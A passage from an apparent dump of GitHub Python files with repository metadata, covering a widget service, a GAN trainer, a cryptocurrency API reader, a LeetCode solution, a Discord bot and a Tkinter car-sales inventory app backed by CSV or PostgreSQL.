widgets to add and send them to be inserted in DB.\"\"\"\n        widget_items_db_data_ids = [widget_item.widget_data_id for widget_item in widget_items_db]\n\n        widget_items_to_add = [widget_item for widget_item in widget_items\n                               if widget_item.get('widget_data_id') not in widget_items_db_data_ids]\n        if len(widget_items_to_add) > 0:\n            self.create_widget_items_bulk(widget_items_to_add, user_id)\n        return widget_items_to_add\n\n    @staticmethod\n    def delete_removed_widget_items(widget_items_to_remain: list, widget_items_db: list):\n        \"\"\"Get the widgets to be deleted and send them to be deleted from DB.\"\"\"\n        widget_items_to_remain_data_ids = [widget_item.get('widget_data_id') for widget_item in widget_items_to_remain]\n\n        widget_items_ids_to_delete = [widget_item.id for widget_item in widget_items_db\n                                      if widget_item.widget_data_id not in widget_items_to_remain_data_ids]\n        if len(widget_items_ids_to_delete) > 0:\n            WidgetItem.delete_widget_items(widget_items_ids_to_delete)\n\n        return widget_items_ids_to_delete\n\n    @staticmethod\n    def update_widget_items_sorting(widget_items: list, widget_id, user_id):\n        \"\"\"Update widget items sorting in bulk.\"\"\"\n        widget_data_ids = [widget_item.get('widget_data_id') for widget_item in widget_items]\n        widget_items_db = WidgetItem.get_widget_items_by_widget_id(widget_id)\n\n        widget_items_update_mapping = [{\n            'id': widget_item_db.id,\n            'sort_index': widget_data_ids.index(widget_item_db.widget_data_id) + 1,\n            'updated_by': user_id\n        } for widget_item_db in widget_items_db]\n\n        updated_widgets_records = WidgetItem.update_widget_items_bulk(widget_items_update_mapping)\n        return updated_widgets_records\n\n    @staticmethod\n    def 
get_widget_by_id(widget_id):\n \"\"\"Get widget by id.\"\"\"\n widget = WidgetModel.get_widget_by_id(widget_id)\n if not widget:\n raise KeyError('Widget ' + widget_id + ' does not exist')\n return widget\n\n def save_widget_items_bulk(self, widget_items: list, widget_id, user_id):\n \"\"\"Save widget items.\"\"\"\n widget: WidgetModel = self.get_widget_by_id(widget_id)\n\n one_of_roles = (\n MembershipType.TEAM_MEMBER.name,\n Role.EDIT_ENGAGEMENT.value\n )\n\n authorization.check_auth(one_of_roles=one_of_roles, engagement_id=widget.engagement_id)\n\n widget_items_db = WidgetItem.get_widget_items_by_widget_id(widget_id)\n\n self.delete_removed_widget_items(widget_items, widget_items_db)\n self.create_added_widget_items(widget_items, widget_items_db, user_id)\n self.update_widget_items_sorting(widget_items, widget_id, user_id)\n return widget_items\n\n @staticmethod\n def delete_widget(engagement_id, widget_id):\n \"\"\"Remove widget from engagement.\"\"\"\n one_of_roles = (\n MembershipType.TEAM_MEMBER.name,\n Role.EDIT_ENGAGEMENT.value\n )\n\n authorization.check_auth(one_of_roles=one_of_roles, engagement_id=engagement_id)\n\n widgets = WidgetModel.remove_widget(engagement_id, widget_id)\n if not widgets:\n raise ValueError('Widget to remove was not found')\n return widgets\n","repo_name":"bcgov/met-public","sub_path":"met-api/src/met_api/services/widget_service.py","file_name":"widget_service.py","file_ext":"py","file_size_in_byte":8209,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"34"} +{"seq_id":"74638458018","text":"#coding:utf-8\n\nimport re\n\nurl_str = 'http://www.baidu.com'\n\ndef check_url(url):\n result = re.findall('[a-zA-Z]{4,5}://\\w+.\\w+.\\w+',url)\n for i in result:\n return True\n return False\n\nif __name__ == '__main__':\n print(check_url(url_str))","repo_name":"coderiding/FullStackNotes","sub_path":"Python/慕课Python全栈笔记/32周/练习代码/level1/7w_code/033urlre.py","file_name":"033urlre.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"34"} +{"seq_id":"10943068613","text":"#!/usr/bin/env python \n# -*- coding: utf-8 -*-\n# @Time : 2022/4/9 13:33\n# @Author : Ly\n# @File : train.py\n# @Software: PyCharm\n# @Github : https://github.com/ly8073\nimport os\n\nimport numpy as np\nimport torch\nfrom matplotlib import pyplot as plt\nfrom torch.utils.data import DataLoader\nfrom torch.nn.functional import one_hot\n\nfrom GAN.models.model_zoo import GanForMinist, Discriminator\nimport MINIST.configs as cfg\n\n\nclass Trainer:\n def __init__(self, epoch=None):\n self.device = \"cuda:0\" if torch.cuda.is_available() else \"cpu\"\n if epoch is not None:\n try:\n check_points = os.path.join(cfg.CHECKPOINT_FOLDER, f\"checkpoints_{epoch}.pkl\")\n dis_criminator_checkpoints = os.path.join(cfg.CHECKPOINT_FOLDER, f\"discriminator_{epoch}.pkl\")\n self.nets = torch.load(check_points).to(self.device)\n self.discriminator = torch.load(dis_criminator_checkpoints).to(self.device)\n except Exception:\n self.nets = GanForMinist(1, 16, 32).to(self.device)\n self.discriminator = Discriminator(784, 1).to(self.device)\n else:\n self.nets = GanForMinist(1, 16, 32).to(self.device)\n self.discriminator = Discriminator(784, 1).to(self.device)\n self.correct_rate = 0.80\n self.discriminator_optimizer = torch.optim.Adam(self.discriminator.parameters(),\n lr=cfg.DISCRIMINATOR_LEARNING_RATE)\n self.optimizer_decode = torch.optim.Adam(self.nets.decode.parameters(), 
lr=cfg.LEARNING_RATE)\n self.optimizer_encode = torch.optim.Adam(self.nets.encode.parameters(), lr=cfg.LEARNING_RATE)\n\n def train(self, train_set, test_set):\n train_loader = DataLoader(train_set, batch_size=cfg.BATCH_SIZE)\n test_loader = DataLoader(test_set, batch_size=cfg.BATCH_SIZE)\n train_losses, test_losses, correct_rates = [], [], []\n for i in range(cfg.EPOCH):\n discriminator_loss = self.train_discriminator(train_loader)\n loss = self.train_one_epoch(train_loader, i)\n train_losses.append(loss)\n eval_loss, correct_rate = self.eval_one_epoch(test_loader)\n correct_rates.append(correct_rate)\n test_losses.append(eval_loss)\n if i % cfg.CHECKPOINT == (cfg.CHECKPOINT - 1):\n if not os.path.exists(cfg.CHECKPOINT_FOLDER):\n os.mkdir(cfg.CHECKPOINT_FOLDER)\n torch.save(self.nets, os.path.join(cfg.CHECKPOINT_FOLDER, f\"checkpoints_{i}.pkl\"))\n torch.save(self.discriminator, os.path.join(cfg.CHECKPOINT_FOLDER, f\"discriminator_{i}.pkl\"))\n print(f\"epoch [{i + 1} / {cfg.EPOCH}] trained done. \"\n f\"\\n\\tdiscirminator_loss = {discriminator_loss}\"\n f\"\\n\\tloss={loss}, \"\n f\"\\n\\teval_loss = {eval_loss},\"\n f\"\\n\\tcorrect_rate = {correct_rate}%\")\n plt.subplot(1, 2, 1)\n plt.plot(train_losses)\n plt.plot(test_losses)\n plt.legend([\"train_losses\", \"test_losses\"])\n plt.subplot(1, 2, 2)\n plt.plot(correct_rates)\n plt.show()\n\n def train_one_epoch(self, data_loader, epoch_num):\n losses = []\n for index, (data, label) in enumerate(data_loader):\n data = data.to(self.device)\n label = label.to(self.device)\n numbers, fake_imgs = self.nets(data, label)\n fake_dis = self.discriminator(fake_imgs)\n loss_number, loss_image = compute_loss(numbers, label, data, fake_imgs)\n loss = loss_image - torch.sum(fake_dis)\n if self.correct_rate <= 0.98:\n self.optimizer_encode.zero_grad()\n loss_number.backward()\n self.optimizer_encode.step()\n self.optimizer_decode.zero_grad()\n loss.backward()\n self.optimizer_decode.step()\n losses.append(loss.item())\n if index % cfg.LOG_PERIOD == 0:\n print(\n f\"epoch [{epoch_num + 1}/{cfg.EPOCH}] of batch: {index}/{len(data_loader)}======loss: {loss.item()},\"\n f\" loss_number: {loss_number.item()}\")\n return np.mean(losses)\n\n def train_discriminator(self, data_loader):\n losses = []\n for index, (data, label) in enumerate(data_loader):\n data = data.to(self.device)\n real_dis = self.discriminator(data)\n random_input = generate_random_number(data.shape[0]).to(self.device)\n fake_image = self.nets.decode(random_input)\n fake_dis = self.discriminator(fake_image)\n loss = torch.sum(fake_dis - real_dis)\n losses.append(loss.item())\n self.discriminator_optimizer.zero_grad()\n loss.backward()\n self.discriminator_optimizer.step()\n return np.mean(losses)\n\n def eval_one_epoch(self, data_loader):\n losses = []\n correct_num, total = 0, 0\n with torch.no_grad():\n for index, (data, label) in enumerate(data_loader):\n data = data.to(self.device)\n label = label.to(self.device)\n numbers, fake_image = self.nets(data)\n fake_dis = self.discriminator(fake_image)\n loss_number, loss_image = compute_loss(numbers, label, data, fake_image)\n loss = loss_image - torch.sum(fake_dis)\n losses.append(loss.item())\n prop, judge = torch.max(numbers, dim=1)\n _, numers = torch.max(label, dim=1)\n correct_num += ((judge == numers).sum().item())\n total += label.size(0)\n self.correct_rate = correct_num / total\n return np.mean(losses), 100 * self.correct_rate\n\n\ndef compute_loss(numbers, label, data, fake_images):\n criterion_number = 
torch.nn.CrossEntropyLoss()\n criterion_image = torch.nn.KLDivLoss()\n loss_number = criterion_number(numbers, label)\n loss_image = criterion_image(fake_images, data) + criterion_image(data, fake_images)\n return loss_number, loss_image\n\n\ndef generate_random_number(batch_num):\n random_number = torch.randint(0, 10, (batch_num, ))\n return one_hot(random_number, num_classes=10).float()\n","repo_name":"ly8073/CV","sub_path":"GAN/models/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"10705372143","text":"import requests\nimport json\nimport logging\nimport time\n\nlogger = logging.getLogger(__name__)\n\n\nclass CoinIoReader:\n\n def __init__(self):\n self.url = \"http://coincap.io/\"\n\n\n # Get : http://coincap.io/front/\n def getCoinCapFrontData(self):\n start = time.time()\n content= self.getCoinCapData('front')\n json_data = json.loads(content.text)\n logger.info(\"Time GET: \" + str(time.time() - start))\n return json_data\n\n #Get Befehl\n def getCoinCapData(self,argument):\n response = requests.get(self.url+argument)\n if (response.ok):\n return response\n else:\n response.raise_for_status()\n\n\n #Methode wird noch nicht verwendet\n def getMostImportantCoins(self, minMktCap):\n allCoins= self.getCoinCapFrontData()\n importantCoinList=[]\n for coins in allCoins:\n if coins[\"mktcap\"] >=minMktCap:\n importantCoinList.append(coins[\"short\"])\n return importantCoinList\n\n #Test Methode laeuft noch nicht\n #Content kann nicht in Dict gewandelt werden aber ich schnall nicht wieso\n def getDataOfImportantCoins(self):\n coinDict={}\n importantCoins=self.getMostImportantCoins(50000000000)\n response= self.getCoinCapData('history/365day/BTC')\n for coin in importantCoins:\n response = self.getCoinCapData('history/365day/'+coin)\n dict = response.json()\n coinDict[coin]=dict\n return coinDict\n\n # Methode wird noch nicht verwendet\n def getCoins(self):\n response = requests.get(self.url + 'coins')\n if (response.ok):\n print(\"\\n\")\n test = response.content\n json_data = json.loads(response.text)\n return json_data\n else:\n response.raise_for_status()\n\n\n\nif __name__ == \"__main__\":\n coinreader= CoinIoReader()\n coinreader.getDataOfImportantCoins()","repo_name":"DatTobbes/Mine-Crypto-Data-an-Tweets","sub_path":"service/collect_from_coincap.py","file_name":"collect_from_coincap.py","file_ext":"py","file_size_in_byte":1930,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"12811297952","text":"from __future__ import annotations\nfrom src.Validations.Validation import Validation\n\n\nclass CourseOpenEnrollmentValidation(Validation):\n \"\"\"\n required kwargs\n student: Student, course_section: CourseSection\n \"\"\"\n __instance = None\n\n @staticmethod\n def getInstance():\n \"\"\" Static access method. \"\"\"\n if CourseOpenEnrollmentValidation.__instance == None:\n CourseOpenEnrollmentValidation()\n return CourseOpenEnrollmentValidation.__instance\n\n def __init__(self):\n \"\"\" Virtually private constructor. 
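Use getInstance() to obtain the shared instance. 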
\"\"\"\n self._conn = None\n if CourseOpenEnrollmentValidation.__instance != None:\n raise Exception(\"This class is a singleton!\")\n else:\n CourseOpenEnrollmentValidation.__instance = self\n\n def is_valid(self, report, **kwargs):\n print(\"course open enrollment validator doing its thang\")\n course_section = kwargs['course_section']\n\n validation = self.__class__.__name__\n success = course_section.enrollment_open\n\n if course_section.enrollment_open:\n msg = \"Course is open for enrollment\"\n else:\n msg = \"Course is not open for enrollment\"\n\n report.add_data(validation=validation, success=success, msg=msg)\n","repo_name":"noahpselman/oop","sub_path":"src/Validations/CourseOpenEnrollmentValidation.py","file_name":"CourseOpenEnrollmentValidation.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"15449655331","text":"\"\"\"\n566. Reshape the Matrix\n\"\"\"\nimport itertools\nfrom typing import List\n\nimport pytest\ndef matrixReshape(mat: List[List[int]], r: int, c: int) -> List[List[int]]:\n m, n = len(mat), len(mat[0])\n if m*n != r*c: return mat\n \"\"\"\n Notice: the matrix initialization!!!\n \"\"\"\n res = [[0 for i in range(c)] for j in range(r)]\n #res = [[0]*c]*r not good, very bad\n # res = [].append(range(r,c))WRONG\n mat_list = [j for i in range(m) for j in mat[i]]\n # print(res, mat_list)\n k = 0\n for i in range(r):\n for j in range(c):\n res[i][j] = mat_list[k]\n print(i, j, res, mat_list[k], k)\n k += 1\n return res\n\n\n# very good answers\ndef matrixReshape1(mat: List[List[int]], r: int, c: int) -> List[List[int]]:\n flat = sum(mat, [])\n if len(flat) != r * c:\n return mat\n tuples = zip(*([iter(flat)] * c))\n return map(list, tuples)\n #return mat if len(sum(mat, [])) != r * c else map(list, zip(*([iter(sum(mat, []))]*c)))\n\ndef matrixReshape2(mat: List[List[int]], r: int, c: int) -> List[List[int]]:\n if r * c != len(mat) * len(mat[0]):\n return mat\n it = itertools.chain(*mat)\n return [list(itertools.islice(it, c)) for _ in range(r)]\n\ntest_case = [\n ([[1,2],[3,4]], 1, 4, [[1,2,3,4]]),\n ([[1,2],[3,4]], 4, 1, [[1],[2],[3],[4]]),\n ([[1,2],[3,4]], 2, 1, [[1,2],[3,4]]),\n ([[1,2,3], [4,5,6]], 3, 2, [[1, 2], [3, 4], [5, 6]]),\n ([[1,2,3], [4,5,6]], 6, 1, [[1],[2],[3],[4],[5],[6]]),\n]\n\n@pytest.mark.parametrize(\"mat, r, c, expect\", test_case)\ndef test_matrixReshape(mat: List[List[int]], r: int, c: int, expect: List[List[int]])->None:\n assert matrixReshape(mat, r, c) == expect","repo_name":"Cheedge/LeetCode_Honing","sub_path":"Leetcode/566.py","file_name":"566.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"34379249845","text":"import discord\nfrom discord.ext import commands\n\nclass Commands():\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(aliases=[\"t\"], description='Temporary command KEK')\n async def test(self, ctx):\n await ctx.send(\"Test\")\n\n @commands.command(aliases=[\"attack\"], description='Have magikarp attack a user!')\n async def splash(self, ctx, *, target: discord.User):\n embed = discord.Embed(title='Magikarp used splash against '+target.name, colour=ctx.author.colour)\n embed.set_author(icon_url=self.bot.user.avatar_url, name=str(self.bot.user.name))\n await ctx.send(content=None, embed=embed)\n\n\ndef setup(bot):\n 
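# entry point called by bot.load_extension to register this cog\n    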
bot.add_cog(Commands(bot))","repo_name":"CheesecakeCG/MagikarpBot","sub_path":"Extensions/commands/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"15542479160","text":"### Import required modules ###\n\n#These are the 2 modules from the directory\nimport constant, helper\n\nimport csv\nfrom tabulate import tabulate\nfrom tkinter import *\nfrom tkinter import ttk\nfrom functools import partial\nimport sys\n\n#If the constant file is set to use a DB for storage then this will trigger\n#It connects to the DB, and then executes 2 postgreSQL commands\n#These commands ensure that the tables are created in the database\n#The URI of said database is accessable from the constants file\nif not sys.argv[1].lower()==\"csv\":\n #Importing the required SQL alchemy modules to set up the DB only needed when running in DB mode\n from sqlalchemy import create_engine\n from sqlalchemy.orm import scoped_session, sessionmaker\n\n #Connecting to the corrects server\n engine = create_engine(constant.dbURI)\n db = scoped_session(sessionmaker(bind=engine))\n\n # Creates table \"car\" this stores data about the car\n db.execute(\"\"\"CREATE TABLE IF NOT EXISTS \"car\" (\n\"id\" serial NOT NULL,\n\"model\" character varying NOT NULL,\n\"cost\" integer NOT NULL,\n\"year\" integer NOT NULL,\n\"emissions\" integer NOT NULL,\n\"extras\" character varying NOT NULL,\n\"discount\" integer NOT NULL,\n\"addition\" integer NOT NULL,\n\"final\" integer NOT NULL,\n\"salesperson\" character varying NOT NULL\n);\"\"\")\n # Creates table \"salesperson\" this stores data about the salespeople\n db.execute(\"\"\"CREATE TABLE IF NOT EXISTS \"salesperson\" (\n\"id\" serial NOT NULL,\n\"name\" character varying NOT NULL,\n\"total\" integer NOT NULL,\n\"salesValue\" integer NOT NULL,\n\"numberOfSales\" integer NOT NULL\n);\"\"\")\n\n #Commits changes to the database\n db.commit()\n\n\"\"\"\n _ _ ___ _ _ ____ _ _ ___\n | \\ | | / _ \\ | \\ | | / ___| | | | | |_ _|\n | \\| | | | | | | \\| | _____ | | _ | | | | | |\n | |\\ | | |_| | | |\\ | |_____| | |_| | | |_| | | |\n |_| \\_| \\___/ |_| \\_| \\____| \\___/ |___|\n\n\"\"\"\n#This is the function that runs when the user selects to run in the txt viewCar\ndef nonGUI():\n #Looped to allow multiple cars to be added easily\n while True:\n #Essentially the menu\n choice = input(\"Would you like to view the data or add a car or view your sales or quit [view/add/sales/quit] - \").lower()\n #If user elects to add a new car\n if choice == 'add':\n #Loops until an acceptable set of inputs has been provided\n #This is controlled by the validator function in helper.py\n while True:\n carDetails = helper.acceptDetails()\n validator = helper.validateInput(carDetails)\n if validator:\n #Prints error and allows user to see issue\n print(\"-- ERROR WITH INPUT --\")\n print(validator)\n else:\n #Once an acceptable set is inputed\n break\n #Calculates the discount\n discount = helper.calculateDiscount(carDetails)\n #Calculates the addition\n addition = helper.calculateAddition(carDetails)\n #Calculates the final\n final = helper.calculateFinal(carDetails.cost, discount, addition)\n #Generates a pricelist with the class `priceList`\n priceList = constant.priceList(discount, addition, final)\n #Calculates the comission\n comissionAmount = round(helper.comission(priceList, carDetails), 2)\n #Outputs the inputs and calculated valuse\n #Must be cast to string to take 
advantage of the classes __str__\n print(str(carDetails))\n print(str(priceList))\n print(f\"(Comission => {comissionAmount})\")\n #Checks the user wants to save this car, or just calculate the values\n if input(\"Would you like to save this car [y/n] - \").lower() == 'y':\n #Requests a name to store the car under\n salesPerson = input(\"Enter your name - \")\n #Checks if storage is in csv or DB\n if sys.argv[1].lower()==\"csv\":\n #Writes data to the CSV\n #Fisrt the data for the car\n csvWriter = csv.writer(open('carSales.csv', 'a'))\n csvWriter.writerow([carDetails.model,carDetails.cost,carDetails.year,carDetails.emissions,carDetails.extra,priceList.discount, priceList.addition, priceList.final, salesPerson])\n #Then the data for the salesperson\n readerData = list(csv.reader(open('salesData.csv')))\n #first check that they dont already exist\n found = False\n for i in range(len(readerData)):\n if readerData[i][0] == salesPerson:\n #If they do already exst then add the data to the old data\n found = True\n readerData[i][1] = int(readerData[i][1]) + comissionAmount\n readerData[i][2] = int(readerData[i][2]) + priceList.final\n readerData[i][3] = int(readerData[i][3]) + 1\n writer = csv.writer(open('salesData.csv', 'w'))\n writer.writerows(readerData)\n if not found:\n #Otherwise add them to the file\n writer = csv.writer(open('salesData.csv', 'a'))\n writer.writerow([salesPerson, comissionAmount,priceList.final,1])\n else:\n #Add car to the database\n db.execute(\"INSERT INTO car (model, cost, year,emissions,extras, discount, addition, final, salesperson) VALUES (:model, :cost, :year, :emissions, :extras, :discount, :addition, :final, :salesperson)\",\n {\"model\": carDetails.model, \"cost\": carDetails.cost, \"year\": carDetails.year, \"emissions\": carDetails.emissions, \"extras\": carDetails.extra, \"discount\": priceList.discount, \"addition\": priceList.addition, \"final\": priceList.final, \"salesperson\": salesPerson})\n db.commit()\n #Commit this change (commited now as contingency incase of accidental disconnect, etc)\n line = db.execute(\"SELECT * FROM salesperson WHERE name = :salesperson\", {\"salesperson\":salesPerson}).fetchone()\n #Check for data\n if line != None:\n line = list(line)\n db.execute(\"UPDATE salesperson SET total= :comission, salesValue = :final, numberOfSales = :salesCount WHERE name = :salesperson;\", {\"comission\" :line[2]+comissionAmount , \"final\":line[3]+ priceList.final , \"salesCount\": line[4]+1, \"salesperson\" : salesPerson})\n else:\n db.execute(\"INSERT INTO salesperson (name,total,salesValue,numberOfSales) VALUES (:name, :total, :salesValue, :numberOfSales)\", {\"name\" : salesPerson, \"total\":comissionAmount, \"salesValue\": priceList.final, \"numberOfSales\":1})\n db.commit()\n #If the user elected to view the data instead\n elif choice == 'view':\n #get the data from whereever it currently exists\n if sys.argv[1].lower()==\"csv\":\n #print the heading\n print('\\nCAR DATA\\n')\n #Pull the data, and use tabulate to generate an ASCII table for displaying\n data = list(csv.reader(open('carSales.csv')))\n print(tabulate(data,headers=\"firstrow\",tablefmt=\"grid\"))\n #print the heading\n print('\\nSALES DATA\\n')\n #Pull the data, and use tabulate to generate an ASCII table for displaying\n data = list(csv.reader(open('salesData.csv')))\n print(tabulate(data,headers=\"firstrow\",tablefmt=\"grid\"))\n else:\n #Pull the data from the DB\n carData = list(db.execute(\"SELECT * FROM car\").fetchall())\n #print the heading\n print('\\n CAR DATA 
\\n')\n #Use tabulate to generate an ASCII table for displaying\n print(tabulate(carData,headers=[\"id\",\"Model\",\"Initial Price\",\"Year\",\"Emissions\",\"Extras\",\"Discount\",\"Addition\",\"Final Price\",\"Salesperson\"],tablefmt=\"grid\"))\n #print the heading\n print('\\nSALES DATA\\n')\n #Pull the data, and use tabulate to generate an ASCII table for displaying\n data = list(db.execute(\"SELECT * FROM salesperson\").fetchall())\n print(tabulate(data,headers=[\"id\",\"name\",\"Comission\",\"Sales Total\",\"Sales\"],tablefmt=\"grid\"))\n #If the user elected to see the sales data\n elif choice == 'sales':\n if sys.argv[1].lower()==\"csv\":\n #Pull the data from the CSV\n data = list(csv.reader(open('salesData.csv')))\n #print the heading\n print('\\n SALES DATA \\n')\n #Use tabulate to generate an ASCII table for displaying\n print(tabulate(data,headers=\"firstrow\",tablefmt=\"grid\"))\n else:\n #Pull the data from the DB\n data = list(db.execute(\"SELECT * FROM car WHERE salesperson = :name\", {\"name\":input('Enter the name of the salesperson - ')}).fetchall())\n #print the heading\n print('\\n SALES DATA \\n')\n #Use tabulate to generate an ASCII table for displaying\n print(tabulate(data,headers=[\"id\",\"Model\",\"Initial Price\",\"Year\",\"Emissions\",\"Extras\",\"Discount\",\"Addition\",\"Final Price\",\"Salesperson\"],tablefmt=\"grid\"))\n #Allows the user to quit the program, will do so too if the text was not one of the 3 options\n else:\n exit()\n\n\"\"\"\n ____ _ _ ___\n / ___| | | | | |_ _|\n | | _ | | | | | |\n | |_| | | |_| | | |\n \\____| \\___/ |___|\n\n\"\"\"\n\ndef homePage():\n #Main home page of the app, shows 3 buttons, allowing rediect to other pages\n root = Tk()\n canvas = Canvas(root, width = 400, height = 300)\n canvas.pack()\n #Sets up title, sub title and buttons\n title = Label(root, text='Car Inventory')\n title.config(font=('helvetica', 30))\n canvas.create_window(200, 25, window=title)\n\n subTitle = Label(root, text='Select an option:')\n subTitle.config(font=('helvetica', 10))\n canvas.create_window(200, 100, window=subTitle)\n\n viewCar = Button (text = \"View Cars\", command = viewCarPage ,width = 12)\n viewCar.place(x = 150,y = 110)\n\n viewSales = Button (text = \"View Sales\", command = viewSalePage,width = 12)\n viewSales.place(x = 150,y = 135)\n\n #partial has to be used here to create the function so it can be called without parameters\n #This is because the command in Button doesnt support parsing parameters\n add_Page=partial(addPage, \"\")\n addCar = Button (text = \"Add Car\", command=add_Page, width = 12)\n addCar.place(x = 150,y = 160)\n\n root.mainloop()\n\n#This page will show a table of the cars\ndef viewCarPage():\n #Grab the data for the car\n carData = list(csv.reader(open('carSales.csv')))[1:] if sys.argv[1].lower()==\"csv\" else list(db.execute(\"SELECT * FROM car\").fetchall())\n #Set up tkinter\n root = Tk()\n\n #Define the table headers\n if not sys.argv[1].lower()==\"csv\":\n head = [\"ID\",\"Model\",\"Initial Price\",\"Year\",\"Emissions\",\"Extras\",\"Discount\",\"Addition\",\"Final Price\",\"Salesperson\"]\n else:\n head = [\"Model\",\"Initial Price\",\"Year\",\"Emissions\",\"Extras\",\"Discount\",\"Addition\",\"Final Price\",\"Salesperson\"]\n #treeview allows the generation of a table in tk\n treeview = ttk.Treeview(root)\n treeview.grid(columnspan=10)\n treeview[\"columns\"] = head\n treeview[\"show\"] = \"headings\"\n for val in head:\n treeview.heading(val, text=val)\n treeview.column(val, minwidth=0, width=120)\n 
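# add one row per car record to the table\n    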
index, iid = 0, 0\n for val in carData:\n treeview.insert(\"\", index, iid, values=tuple(val))\n index +=1\n iid+=1\n root.mainloop()\n\n#Similar to viewCarPage this funtion shows a window with the data for the salespeople instead\ndef viewSalePage():\n #Grab the data for the car\n salesData = list(csv.reader(open('salesData.csv')))[1:] if sys.argv[1].lower()==\"csv\" else list(db.execute(\"SELECT * FROM salesperson\").fetchall())\n #Set up tkinter\n root = Tk()\n\n #Define the table headers\n if not sys.argv[1].lower()==\"csv\":\n head = [\"ID\",\"Name\",\"Total Comission\",\"Value Sold\",\"Cars Sold\"]\n else:\n head = [\"Name\",\"Total Comission\",\"Value Sold\",\"Cars Sold\"]\n #treeview used to generate a table in tk\n treeview = ttk.Treeview(root)\n treeview.grid(columnspan=9)\n treeview[\"columns\"] = head\n treeview[\"show\"] = \"headings\"\n for val in head:\n treeview.heading(val, text=val)\n treeview.column(val, minwidth=0, width=120)\n index, iid = 0, 0\n for val in salesData:\n treeview.insert(\"\", index, iid, values=tuple(val))\n index +=1\n iid+=1\n root.mainloop()\n\n#Function that adds data based on the inputs\n#must take the buttons as params\ndef addData(modelIn1,modelIn2,modelIn3,modelIn4,modelIn5,modelIn6):\n #Get inputs once submit is pressed\n x1,x2,x3,x4,x5 = (modelIn1.get()),(modelIn5.get()),(modelIn2.get()),(modelIn3.get()),(modelIn4.get())\n #Create a car object\n carData = constant.car(x1 , x2,x3,x4,x5)\n #Get inputed sales person\n salesPerson = modelIn6.get()\n\n #Validate inputs\n validator = helper.validateInput(carData)\n if validator:\n #Display bassic error page, no context passed in here\n root = Tk()\n canvas = Canvas(root, width = 400, height = 300)\n canvas.pack()\n\n title = Label(root, text='Error with Inputs')\n title.config(font=('helvetica', 30))\n canvas.create_window(200, 25, window=title)\n\n root.mainloop()\n\n else:\n #Store data\n discount = helper.calculateDiscount(carData)\n addition = helper.calculateAddition(carData)\n final = helper.calculateFinal(carData.cost, discount, addition)\n priceList = constant.priceList(discount, addition, final)\n comissionAmount = round(helper.comission(priceList, carData), 2)\n if sys.argv[1].lower()==\"csv\":\n csvWriter = csv.writer(open('carSales.csv', 'a'))\n csvWriter.writerow([carData.model,carData.cost,carData.year,carData.emissions,carData.extra,priceList.discount, priceList.addition, priceList.final, salesPerson])\n readerData = list(csv.reader(open('salesData.csv')))\n found = False\n for i in range(len(readerData)):\n if readerData[i][0] == salesPerson:\n found = True\n readerData[i][1] = int(float(readerData[i][1])) + comissionAmount\n readerData[i][2] = int(float(readerData[i][2])) + priceList.final\n readerData[i][3] = int(readerData[i][3]) + 1\n writer = csv.writer(open('salesData.csv', 'w'))\n writer.writerows(readerData)\n if not found:\n writer = csv.writer(open('salesData.csv', 'a'))\n writer.writerow([salesPerson, comissionAmount,priceList.final,1])\n #Display the addPage again, with the message data added\n addPage(\"Data Added\")\n else:\n global db\n db.execute(\"INSERT INTO car (model, cost, year,emissions,extras, discount, addition, final, salesperson) VALUES (:model, :cost, :year, :emissions, :extras, :discount, :addition, :final, :salesperson)\",\n {\"model\": carData.model, \"cost\": carData.cost, \"year\": carData.year, \"emissions\": carData.emissions, \"extras\": carData.extra, \"discount\": priceList.discount, \"addition\": priceList.addition, \"final\": priceList.final, 
\"salesperson\": salesPerson})\n db.commit()\n line = db.execute(\"SELECT * FROM salesperson WHERE name = :salesperson\", {\"salesperson\":salesPerson}).fetchone()\n if line != None:\n line = list(line)\n db.execute(\"UPDATE salesperson SET total= :comission, salesValue = :final, numberOfSales = :salesCount WHERE name = :salesperson;\", {\"comission\" :line[2]+comissionAmount , \"final\":line[3]+ priceList.final , \"salesCount\": line[4]+1, \"salesperson\" : salesPerson})\n else:\n db.execute(\"INSERT INTO salesperson (name,total,salesValue,numberOfSales) VALUES (:name, :total, :salesValue, :numberOfSales)\", {\"name\" : salesPerson, \"total\":comissionAmount, \"salesValue\": priceList.final, \"numberOfSales\":1})\n db.commit()\n #Display the addPage again, with the message data added\n addPage(\"Data Added\")\n\n\n#The form for data input\ndef addPage(message):\n #shows a page for adding the data\n pageAdd = Tk()\n canvas = Canvas(pageAdd, width = 300, height = 300)\n title = Label(pageAdd, text='Add Car')\n title.config(font=('helvetica', 30))\n canvas.create_window(150, 25, window=title)\n #Will display a message if not \"\" or None\n if message:\n subtitle = Label(pageAdd, text=message)\n subtitle.config(font=('helvetica', 10), fg = \"black\")\n canvas.create_window(150, 50, window=subtitle)\n\n #Label values for input form\n inText = (\"Model:\", \"Year:\", \"Emissions:\", \"Extras:\", \"Cost:\", \"Salesperson:\")\n for i in range(len(inText)):\n labels = Label(pageAdd, text=inText[i])\n canvas.create_window(50, 90+(i*30), window=labels)\n\n #Input forms\n modelIn1 = Entry(pageAdd)\n canvas.create_window(200, 90, window=modelIn1)\n modelIn2 = Entry(pageAdd)\n canvas.create_window(200, 120, window=modelIn2)\n modelIn3 = Entry(pageAdd)\n canvas.create_window(200, 150, window=modelIn3)\n modelIn4 = Entry(pageAdd)\n canvas.create_window(200, 180, window=modelIn4)\n modelIn5 = Entry(pageAdd)\n canvas.create_window(200, 210, window=modelIn5)\n modelIn6 = Entry(pageAdd)\n canvas.create_window(200, 240, window=modelIn6)\n\n canvas.pack()\n\n #Submit button\n add_Data = partial(addData,modelIn1,modelIn2,modelIn3,modelIn4,modelIn5,modelIn6)\n submit = Button(canvas, text='Submit', command=add_Data)\n 